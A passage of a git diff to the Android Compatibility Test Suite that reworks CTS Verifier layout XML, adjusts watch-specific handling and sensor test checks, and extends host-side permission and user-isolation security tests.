- android:id="@+id/connectivity_off_test_any_connectivity_image"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:src="@drawable/fs_indeterminate"
- android:layout_marginRight="@dimen/js_padding"/>
<TextView
- android:layout_width="wrap_content"
+ android:layout_width="match_parent"
android:layout_height="wrap_content"
- android:text="@string/js_any_connectivity_test"
- android:textSize="16dp"/>
- </LinearLayout>
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_connectivity_description_1"
+ android:textStyle="bold"/>
- <LinearLayout
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_marginTop="@dimen/js_padding"
- android:layout_marginBottom="@dimen/js_padding">
- <ImageView
- android:id="@+id/connectivity_off_test_no_connectivity_image"
+ <Button
+ android:id="@+id/js_connectivity_start_test_button"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
- android:src="@drawable/fs_indeterminate"
- android:layout_marginRight="@dimen/js_padding"/>
- <TextView
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:text="@string/js_no_connectivity_test"
- android:textSize="16dp"/>
- </LinearLayout>
+ android:layout_gravity="center"
+ android:enabled="false"
+ android:onClick="startTest"
+ android:text="@string/js_start_test_text"/>
- <include layout="@layout/pass_fail_buttons" />
- </LinearLayout>
-</ScrollView>
+ <LinearLayout
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginBottom="@dimen/js_padding"
+ android:layout_marginTop="@dimen/js_padding">
+ <ImageView
+ android:id="@+id/connectivity_off_test_unmetered_image"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginRight="@dimen/js_padding"
+ android:src="@drawable/fs_indeterminate"/>
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/js_unmetered_connectivity_test"
+ android:textSize="16dp"/>
+ </LinearLayout>
+
+ <LinearLayout
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginBottom="@dimen/js_padding"
+ android:layout_marginTop="@dimen/js_padding">
+ <ImageView
+ android:id="@+id/connectivity_off_test_any_connectivity_image"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginRight="@dimen/js_padding"
+ android:src="@drawable/fs_indeterminate"/>
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/js_any_connectivity_test"
+ android:textSize="16dp"/>
+ </LinearLayout>
+
+ <LinearLayout
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginBottom="@dimen/js_padding"
+ android:layout_marginTop="@dimen/js_padding">
+ <ImageView
+ android:id="@+id/connectivity_off_test_no_connectivity_image"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginRight="@dimen/js_padding"
+ android:src="@drawable/fs_indeterminate"/>
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/js_no_connectivity_test"
+ android:textSize="16dp"/>
+ </LinearLayout>
+
+ <include layout="@layout/pass_fail_buttons"/>
+ </LinearLayout>
+ </ScrollView>
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/js_idle.xml b/apps/CtsVerifier/res/layout/js_idle.xml
index f329d5b..620ed97 100644
--- a/apps/CtsVerifier/res/layout/js_idle.xml
+++ b/apps/CtsVerifier/res/layout/js_idle.xml
@@ -1,4 +1,5 @@
-<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2016 The Android Open Source Project
+<?xml version="1.0" encoding="utf-8"?><!--
+ Copyright (C) 2016 The Android Open Source Project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
@@ -12,71 +13,74 @@
See the License for the specific language governing permissions and
limitations under the License.
-->
-<ScrollView
- xmlns:android="http://schemas.android.com/apk/res/android"
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:orientation="vertical">
- <LinearLayout
- android:orientation="vertical"
+ <ScrollView
android:layout_width="match_parent"
android:layout_height="match_parent">
- <TextView
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/js_test_description"
- android:layout_margin="@dimen/js_padding"/>
- <Button
- android:id="@+id/js_idle_start_test_button"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_gravity="center"
- android:text="@string/js_start_test_text"
- android:onClick="startTest"
- android:enabled="false"/>
- <TextView
- android:id="@+id/js_idle_continue_instruction_view"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/js_idle_continue_instruction"
- android:layout_margin="@dimen/js_padding"
- android:textStyle="bold"
- android:visibility="gone"/>
+ <LinearLayout android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+ <TextView
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_test_description"/>
+ <Button
+ android:id="@+id/js_idle_start_test_button"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_gravity="center"
+ android:enabled="false"
+ android:onClick="startTest"
+ android:text="@string/js_start_test_text"/>
+ <TextView
+ android:id="@+id/js_idle_continue_instruction_view"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_idle_continue_instruction"
+ android:textStyle="bold"
+ android:visibility="gone"/>
- <LinearLayout
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_marginTop="@dimen/js_padding"
- android:layout_marginBottom="@dimen/js_padding">
- <ImageView
- android:id="@+id/idle_off_test_image"
+ <LinearLayout
android:layout_width="wrap_content"
android:layout_height="wrap_content"
- android:src="@drawable/fs_indeterminate"
- android:layout_marginRight="@dimen/js_padding"/>
- <TextView
+ android:layout_marginBottom="@dimen/js_padding"
+ android:layout_marginTop="@dimen/js_padding">
+ <ImageView
+ android:id="@+id/idle_off_test_image"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginRight="@dimen/js_padding"
+ android:src="@drawable/fs_indeterminate"/>
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/js_idle_item_idle_off"
+ android:textSize="16dp"/>
+ </LinearLayout>
+ <LinearLayout
android:layout_width="wrap_content"
android:layout_height="wrap_content"
- android:text="@string/js_idle_item_idle_off"
- android:textSize="16dp"/>
+ android:layout_marginBottom="@dimen/js_padding"
+ android:layout_marginTop="@dimen/js_padding">
+ <ImageView
+ android:id="@+id/idle_on_test_image"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginRight="@dimen/js_padding"
+ android:src="@drawable/fs_indeterminate"/>
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/js_idle_item_idle_on"
+ android:textSize="16dp"/>
+ </LinearLayout>
+
+ <include layout="@layout/pass_fail_buttons"/>
</LinearLayout>
- <LinearLayout
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_marginTop="@dimen/js_padding"
- android:layout_marginBottom="@dimen/js_padding">
- <ImageView
- android:id="@+id/idle_on_test_image"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:src="@drawable/fs_indeterminate"
- android:layout_marginRight="@dimen/js_padding"/>
- <TextView
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:text="@string/js_idle_item_idle_on"
- android:textSize="16dp"/>
- </LinearLayout>
- <include layout="@layout/pass_fail_buttons" />
- </LinearLayout>
-</ScrollView>
+ </ScrollView>
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/list_content.xml b/apps/CtsVerifier/res/layout/list_content.xml
index e7de596..decef55 100644
--- a/apps/CtsVerifier/res/layout/list_content.xml
+++ b/apps/CtsVerifier/res/layout/list_content.xml
@@ -15,14 +15,12 @@
~ See the License for the specific language governing permissions and
~ limitations under the License
-->
-<com.android.cts.verifier.BoxInsetLayout xmlns:android="http://schemas.android.com/apk/res/android"
- xmlns:app="http://schemas.android.com/apk/res-auto"
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
- android:layout_height="match_parent">
-
- <ListView
- android:id="@android:id/list"
- app:ctsv_layout_box="all"
- android:layout_width="match_parent"
- android:layout_height="match_parent" />
-</com.android.cts.verifier.BoxInsetLayout>
+ android:layout_height="match_parent"
+ style="@style/RootLayoutPadding">
+ <ListView
+ android:id="@android:id/list"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/location_mode_main.xml b/apps/CtsVerifier/res/layout/location_mode_main.xml
index 8b2ab43..a9206fa 100644
--- a/apps/CtsVerifier/res/layout/location_mode_main.xml
+++ b/apps/CtsVerifier/res/layout/location_mode_main.xml
@@ -18,22 +18,26 @@
android:layout_width="match_parent"
android:layout_height="match_parent"
android:orientation="vertical">
-
- <ScrollView
- android:id="@+id/test_scroller"
+ <LinearLayout
android:layout_width="match_parent"
- android:layout_height="0dp"
- android:layout_weight="1"
+ android:layout_height="match_parent"
android:orientation="vertical">
- <LinearLayout
- android:id="@+id/test_items"
+ <ScrollView
+ android:id="@+id/test_scroller"
android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:orientation="vertical" >
- </LinearLayout>
- </ScrollView>
+ android:layout_height="0dp"
+ android:layout_weight="1"
+ android:orientation="vertical">
+ <LinearLayout
+ android:id="@+id/test_items"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:orientation="vertical">
+ </LinearLayout>
+ </ScrollView>
- <include layout="@layout/pass_fail_buttons" />
+ <include layout="@layout/pass_fail_buttons"/>
+ </LinearLayout>
</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/positive_device_owner.xml b/apps/CtsVerifier/res/layout/positive_device_owner.xml
index aab9ecd..fa437de 100644
--- a/apps/CtsVerifier/res/layout/positive_device_owner.xml
+++ b/apps/CtsVerifier/res/layout/positive_device_owner.xml
@@ -47,4 +47,4 @@
<include layout="@layout/pass_fail_buttons" />
</LinearLayout>
</ScrollView>
-</LinearLayout>
+</LinearLayout>
\ No newline at end of file
diff --git a/apps/CtsVerifier/res/layout/provisioning_byod.xml b/apps/CtsVerifier/res/layout/provisioning_byod.xml
index 54b5121..227d8d8 100644
--- a/apps/CtsVerifier/res/layout/provisioning_byod.xml
+++ b/apps/CtsVerifier/res/layout/provisioning_byod.xml
@@ -1,12 +1,8 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!-- Copyright (C) 2011 The Android Open Source Project
-
+<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2011 The Android Open Source Project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
-
http://www.apache.org/licenses/LICENSE-2.0
-
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
@@ -14,34 +10,28 @@
limitations under the License.
-->
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
- android:orientation="vertical"
- android:layout_width="match_parent"
- android:layout_height="match_parent"
- >
-
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
<ScrollView
- android:layout_width="match_parent"
- android:layout_height="150dp"
- android:layout_weight="2">
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_weight="2">
<TextView
- android:id="@+id/test_instructions"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:padding="10dip"
- android:textSize="18dip" />
+ android:id="@+id/test_instructions"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:padding="10dip"
+ android:textSize="18dip"/>
</ScrollView>
-
<Button
android:id="@+id/prepare_test_button"
- android:layout_width="204dp"
- android:layout_height="wrap_content" />
-
+ android:layout_width="204dip"
+ android:layout_height="wrap_content"/>
<ListView
android:id="@+id/android:list"
android:layout_width="match_parent"
android:layout_height="wrap_content"
- android:layout_weight="3" />
-
- <include layout="@layout/pass_fail_buttons" />
-
-</LinearLayout>
\ No newline at end of file
+ android:layout_weight="3"/>
+ <include layout="@layout/pass_fail_buttons"/>
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/requesting_bugreport_device_owner.xml b/apps/CtsVerifier/res/layout/requesting_bugreport_device_owner.xml
index 31cedb2..b83388b 100644
--- a/apps/CtsVerifier/res/layout/requesting_bugreport_device_owner.xml
+++ b/apps/CtsVerifier/res/layout/requesting_bugreport_device_owner.xml
@@ -12,34 +12,39 @@
See the License for the specific language governing permissions and
limitations under the License.
-->
-<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
style="@style/RootLayoutPadding"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:orientation="vertical">
- <LinearLayout
+
+ <ScrollView
android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical">
-
- <TextView
- android:id="@+id/requesting_bugreport_device_owner_instructions"
+ android:layout_height="match_parent">
+ <LinearLayout
android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/device_owner_requesting_bugreport_tests_info"
- android:textSize="18dip" />
+ android:layout_height="match_parent"
+ android:orientation="vertical">
- <Button
- android:id="@+id/set_device_owner_button"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/set_device_owner_button_label" />
+ <TextView
+ android:id="@+id/requesting_bugreport_device_owner_instructions"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:text="@string/device_owner_requesting_bugreport_tests_info"
+ android:textSize="18dip" />
- <ListView
- android:id="@+id/android:list"
- android:layout_width="match_parent"
- android:layout_height="wrap_content" />
+ <Button
+ android:id="@+id/set_device_owner_button"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:text="@string/set_device_owner_button_label" />
- <include layout="@layout/pass_fail_buttons" />
- </LinearLayout>
-</ScrollView>
+ <ListView
+ android:id="@+id/android:list"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content" />
+
+ <include layout="@layout/pass_fail_buttons" />
+ </LinearLayout>
+ </ScrollView>
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/values-watch/strings.xml b/apps/CtsVerifier/res/values-watch/strings.xml
index d2106ee..1f25b04 100644
--- a/apps/CtsVerifier/res/values-watch/strings.xml
+++ b/apps/CtsVerifier/res/values-watch/strings.xml
@@ -19,16 +19,4 @@
<item>com.android.cts.verifier.notifications.NotificationAttentionManagementVerifierActivity</item>
<item>com.android.cts.verifier.notifications.NotificationListenerVerifierActivity</item>
</string-array>
-
- <string name="device_owner_device_admin_visible_info">
- Please press the Go button to open Settings, navigate to:\n
- 1. Personalization\n
- 2. Device administration\n
- Confirm that:\n
- \n
- - \"CTS Verifier\" exists and is activated.\n
- - \"CTS Verifier\" cannot be disabled.\n
- \n
- Swipe left to return to this page.
- </string>
</resources>
\ No newline at end of file
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
index 167fd84..6933ef4 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
@@ -21,10 +21,12 @@
import android.content.Context;
import android.content.DialogInterface;
import android.content.Intent;
+import android.content.pm.PackageManager;
import android.database.DataSetObserver;
import android.os.Bundle;
import android.util.Log;
import android.view.LayoutInflater;
+import android.view.MotionEvent;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
@@ -49,6 +51,7 @@
private final int mInstructionsStringId;
protected Button mPrepareTestButton;
+ protected ListView mTestFeaturesList;
protected int mCurrentTestPosition;
@@ -85,15 +88,31 @@
mCurrentTestPosition = 0;
- TextView instructionTextView = (TextView)findViewById(R.id.test_instructions);
+ TextView instructionTextView = (TextView) findViewById(R.id.test_instructions);
instructionTextView.setText(mInstructionsStringId);
- mPrepareTestButton = (Button)findViewById(R.id.prepare_test_button);
+ mPrepareTestButton = (Button) findViewById(R.id.prepare_test_button);
+ mTestFeaturesList = (ListView) findViewById(android.R.id.list);
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH)) {
+ mTestFeaturesList.setOnTouchListener((View v, MotionEvent e) -> {
+ switch (e.getAction()) {
+ case MotionEvent.ACTION_DOWN:
+ v.getParent().requestDisallowInterceptTouchEvent(true);
+ break;
+ case MotionEvent.ACTION_UP:
+ v.getParent().requestDisallowInterceptTouchEvent(false);
+ break;
+ default:
+ }
+ return false;
+ });
+ }
}
/**
* Subclasses must add their tests items to the provided adapter(usually instances of
* {@link DialogTestListItem} or {@link DialogTestListItemWithIcon} but any class deriving from
* {@link TestListAdapter.TestListItem} will do).
+ *
* @param adapter The adapter to add test items to.
*/
protected abstract void setupTests(ArrayTestListAdapter adapter);
@@ -165,7 +184,7 @@
.getItem(position);
if (test instanceof DialogTestListItem) {
mCurrentTestPosition = position;
- ((DialogTestListItem)test).performTest(this);
+ ((DialogTestListItem) test).performTest(this);
} else {
try {
super.handleItemClick(l, v, position, id);
@@ -180,6 +199,7 @@
/**
* Start a test's manual intent
+ *
* @param test The test the manual intent of which is to be started.
* @return true if activity could be started successfully, false otherwise.
*/
@@ -218,6 +238,7 @@
public interface TestCallback {
void onPass();
+
void onFail();
}
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/DeviceOwnerPositiveTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/DeviceOwnerPositiveTestActivity.java
index 9467ecf..024854c 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/DeviceOwnerPositiveTestActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/DeviceOwnerPositiveTestActivity.java
@@ -143,21 +143,12 @@
.putExtra(EXTRA_TEST_ID, getIntent().getStringExtra(EXTRA_TEST_ID))));
// device admin settings
- if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH)) {
- adapter.add(createInteractiveTestItem(this, DEVICE_ADMIN_SETTINGS_ID,
- R.string.device_owner_device_admin_visible,
- R.string.device_owner_device_admin_visible_info,
- new ButtonInfo(
- R.string.device_owner_settings_go,
- new Intent(Settings.ACTION_SETTINGS))));
- } else {
- adapter.add(createInteractiveTestItem(this, DEVICE_ADMIN_SETTINGS_ID,
- R.string.device_owner_device_admin_visible,
- R.string.device_owner_device_admin_visible_info,
- new ButtonInfo(
- R.string.device_owner_settings_go,
- new Intent(Settings.ACTION_SECURITY_SETTINGS))));
- }
+ adapter.add(createInteractiveTestItem(this, DEVICE_ADMIN_SETTINGS_ID,
+ R.string.device_owner_device_admin_visible,
+ R.string.device_owner_device_admin_visible_info,
+ new ButtonInfo(
+ R.string.device_owner_settings_go,
+ new Intent(Settings.ACTION_SECURITY_SETTINGS))));
PackageManager packageManager = getPackageManager();
if (packageManager.hasSystemFeature(PackageManager.FEATURE_WIFI)) {
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
index 7ef63d7..b7d9617 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
@@ -19,6 +19,7 @@
import com.android.cts.verifier.R;
import com.android.cts.verifier.sensors.base.SensorCtsVerifierTestActivity;
+import android.content.pm.PackageManager;
import android.hardware.Sensor;
import android.hardware.SensorManager;
import android.hardware.cts.helpers.TestSensorEnvironment;
@@ -82,6 +83,9 @@
@SuppressWarnings("unused")
public String testProximity_batching() throws Throwable {
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_SENSOR_PROXIMITY)) {
+ return null;
+ }
return runBatchTest(
Sensor.TYPE_PROXIMITY,
REPORT_LATENCY_10_SEC,
@@ -90,6 +94,9 @@
@SuppressWarnings("unused")
public String testProximity_flush() throws Throwable {
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_SENSOR_PROXIMITY)) {
+ return null;
+ }
return runFlushTest(
Sensor.TYPE_PROXIMITY,
REPORT_LATENCY_10_SEC,
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
index c49340e..52dc79b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
@@ -224,6 +224,10 @@
// Verify they can't poke at each other
runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", owner);
runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", secondary);
+
+ // Verify they can't access other users' content using media provider
+ runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", owner);
+ runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", secondary);
} finally {
getDevice().uninstallPackage(MULTIUSER_PKG);
removeUsersForTest(users);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
index 072a533..050845b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
@@ -29,12 +29,18 @@
* dynamic granting and behavior of legacy apps.
*/
public class PermissionsHostTest extends DeviceTestCase implements IAbiReceiver, IBuildReceiver {
- private static final String PKG = "com.android.cts.usepermission";
+ private static final String USES_PERMISSION_PKG = "com.android.cts.usepermission";
+ private static final String ESCALATE_PERMISSION_PKG = "com.android.cts.escalate.permission";
private static final String APK_22 = "CtsUsePermissionApp22.apk";
private static final String APK_23 = "CtsUsePermissionApp23.apk";
private static final String APK_24 = "CtsUsePermissionApp24.apk";
+ private static final String APK_DECLARE_NON_RUNTIME_PERMISSIONS =
+ "CtsDeclareNonRuntimePermissions.apk";
+ private static final String APK_ESCLATE_TO_RUNTIME_PERMISSIONS =
+ "CtsEscalateToRuntimePermissions.apk";
+
private IAbi mAbi;
private IBuildInfo mCtsBuild;
@@ -55,14 +61,16 @@
assertNotNull(mAbi);
assertNotNull(mCtsBuild);
- getDevice().uninstallPackage(PKG);
+ getDevice().uninstallPackage(USES_PERMISSION_PKG);
+ getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
}
@Override
protected void tearDown() throws Exception {
super.tearDown();
- getDevice().uninstallPackage(PKG);
+ getDevice().uninstallPackage(USES_PERMISSION_PKG);
+ getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
}
public void testFail() throws Exception {
@@ -70,7 +78,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testFail");
fail("Expected remote failure");
} catch (AssertionError expected) {
@@ -82,7 +90,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testKill");
fail("Expected remote failure");
} catch (AssertionError expected) {
@@ -93,7 +101,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatDefault");
}
@@ -102,12 +110,12 @@
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatRevoked_part1");
fail("App must be killed on a permission revoke");
} catch (AssertionError expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatRevoked_part2");
}
@@ -115,63 +123,63 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testNoRuntimePrompt");
}
public void testDefault23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testDefault");
}
public void testGranted23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGranted");
}
public void testInteractiveGrant23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testInteractiveGrant");
}
public void testRuntimeGroupGrantSpecificity23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRuntimeGroupGrantSpecificity");
}
public void testRuntimeGroupGrantExpansion23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRuntimeGroupGrantExpansion");
}
public void testCancelledPermissionRequest23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testCancelledPermissionRequest");
}
public void testRequestGrantedPermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestGrantedPermission");
}
public void testDenialWithPrejudice23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testDenialWithPrejudice");
}
@@ -179,11 +187,11 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokeAffectsWholeGroup_part1");
} catch (AssertionError expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokeAffectsWholeGroup_part2");
}
@@ -191,51 +199,51 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part1");
fail("App must be killed on a permission revoke");
} catch (Throwable expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part2");
}
public void testRequestNonRuntimePermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestNonRuntimePermission");
}
public void testRequestNonExistentPermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestNonExistentPermission");
}
public void testRequestPermissionFromTwoGroups23() throws Exception {
